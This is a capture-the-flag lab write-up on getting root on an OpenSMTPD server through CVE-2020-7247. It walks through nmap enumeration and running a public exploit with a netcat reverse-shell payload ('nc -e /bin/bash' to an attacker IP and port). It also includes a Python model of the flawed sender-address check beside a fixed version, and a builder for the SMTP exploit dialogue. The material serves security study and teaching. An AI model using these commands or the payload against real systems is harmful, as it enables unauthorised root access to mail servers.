This is a target running an OpenSMTPD instance vulnerable to CVE-2020-7247.
The vulnerability, discovered in OpenSMTPD (OpenBSD's mail server), has been exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands as root. The root cause is in smtp_mailaddr(): a MAIL FROM address whose local part fails validation but whose domain part is empty is "repaired" by appending the server's own domain and then accepted without the local part being checked again, so shell metacharacters such as ";" survive. That sender address is later substituted into the mbox delivery command line, which OpenSMTPD runs through /bin/sh -c as root.
Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase.
Warning: 10.0.100.33 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase.
Nmap scan report for 10.0.100.33
Host is up (0.15s latency).
Not shown: 40969 closed ports, 24565 filtered ports
PORT   STATE SERVICE
25/tcp open  smtp

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec 4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds
As usual, run the default nmap scripts and service detection against the one open port.
nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33
Nmap scan report for 10.0.100.33
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact email@example.com 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: CVE-2020-7247.echocity-f.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds
The service banner identifies OpenSMTPD and the hostname itself names the CVE, so a quick search turns up a public exploit for it on Exploit-DB (EDB-ID 47984).
Smooth, let's run it with a reverse shell as the payload.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247]
└─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
Now check the Ncat listener that was started beforehand on 10.10.0.186 port 1337. Because the command runs through the mbox delivery path, the shell that connects back runs as root. Note that the payload relies on the target's nc build supporting -e; if it does not, a different reverse-shell one-liner is needed.
We are done.
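As an added example (not code from the original post, not OpenSMTPD's source and not the exploit-db script run above), here is a Python model of the check that CVE-2020-7247 bypasses. It shows the vulnerable smtp_mailaddr() flow beside a version that re-validates after the domain repair, the mbox command line the sender lands in, and the client half of the SMTP exchange in the shape of the public Qualys proof of concept. The atext character set follows OpenSMTPD's valid_localpart(); the domain check is simplified, the mail.local command template and the 14 padding lines are assumptions, and the domain name is the HELO name from the nmap output.

```python
# Python model of the CVE-2020-7247 input-validation bug (added example,
# not OpenSMTPD code and not the exploit-db script used in the writeup).

MAILADDR_ALLOWED = "!#$%&'*/?^`{|}~+-=_"   # atext characters OpenSMTPD allows in a local part
DEFAULT_DOMAIN = "CVE-2020-7247.echocity-f.com"  # the target's HELO name from the nmap output
# Assumed shape of the mbox delivery template; the real string lives in OpenSMTPD's config code.
MBOX_COMMAND = "/usr/libexec/mail.local -f %{mbox.from} -- %{user.username}"


def valid_localpart(s: str) -> bool:
    """Model of OpenSMTPD valid_localpart(): non-empty dot-separated atoms of atext."""
    if not s:
        return False
    return all(atom and all(c.isalnum() or c in MAILADDR_ALLOWED for c in atom)
               for atom in s.split("."))


def valid_domainpart(s: str) -> bool:
    """Simplified model: dotted labels of letters, digits and hyphens (IP literals omitted)."""
    if not s:
        return False
    return all(label and all(c.isalnum() or c == "-" for c in label)
               for label in s.split("."))


def split_addr(addr: str):
    """'<user@domain>' -> (user, domain); no '@' means the domain part is empty."""
    addr = addr.strip()
    if addr.startswith("<") and addr.endswith(">"):
        addr = addr[1:-1]
    user, sep, domain = addr.rpartition("@")
    return (user, domain) if sep else (addr, "")


def smtp_mailaddr_vulnerable(addr: str, mailfrom: bool, default_domain: str = DEFAULT_DOMAIN):
    """Return (accepted, (user, domain)) following the pre-6.6.2p1 control flow."""
    user, domain = split_addr(addr)
    if not valid_localpart(user) or not valid_domainpart(domain):
        if mailfrom and user == "" and domain == "":
            return True, ("", "")        # empty return-path, required for bounces
        if user == "":
            return False, None           # no user part: reject
        if domain == "":
            domain = default_domain      # "repair" the missing domain ...
        else:
            return False, None
        # ... and fall through: the invalid local part is never re-checked.
    return True, (user, domain)


def smtp_mailaddr_fixed(addr: str, mailfrom: bool, default_domain: str = DEFAULT_DOMAIN):
    """Same flow, but the local part is validated again after the repair."""
    accepted, parsed = smtp_mailaddr_vulnerable(addr, mailfrom, default_domain)
    if accepted and parsed != ("", "") and not valid_localpart(parsed[0]):
        return False, None
    return accepted, parsed


def mbox_shell_command(user: str, domain: str, recipient: str) -> str:
    """The string /bin/sh -c receives once the sender is substituted into the template."""
    return (MBOX_COMMAND.replace("%{mbox.from}", f"{user}@{domain}")
                        .replace("%{user.username}", recipient))


def exploit_dialogue(cmd: str, helo: str = "x", rcpt: str = "root"):
    """Client side of the SMTP exchange, in the shape of the public Qualys PoC: the
    sender's local part makes sh skip the header lines and run the message body."""
    sender = ";for i in 0 1 2 3 4 5 6 7 8 9 a b c d e f;do read r;done;sh;exit 0;"
    padding = [f"#{x:x}" for x in range(14)]  # comment lines, harmless if sh reads them
    return ([f"HELO {helo}", f"MAIL FROM:<{sender}>", f"RCPT TO:<{rcpt}>", "DATA", ""]
            + padding + [cmd, ".", "QUIT"])


if __name__ == "__main__":
    bad = "<;nc -e /bin/bash 10.10.0.186 1337;>"
    ok, parsed = smtp_mailaddr_vulnerable(bad, True)
    print("vulnerable accepts:", ok, parsed)
    print("fixed accepts:     ", smtp_mailaddr_fixed(bad, True))
    print("sh -c", repr(mbox_shell_command(parsed[0], parsed[1], "root")))
    print("\n".join(exploit_dialogue("nc -e /bin/bash 10.10.0.186 1337")))
```

Running it shows the ";" separated command surviving into the mail.local command line, where sh splits it into three commands and runs the middle one. It also shows why an address with an "@" in it is rejected: the domain is then non-empty, so the repair branch is never taken.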
Greetings from Muzec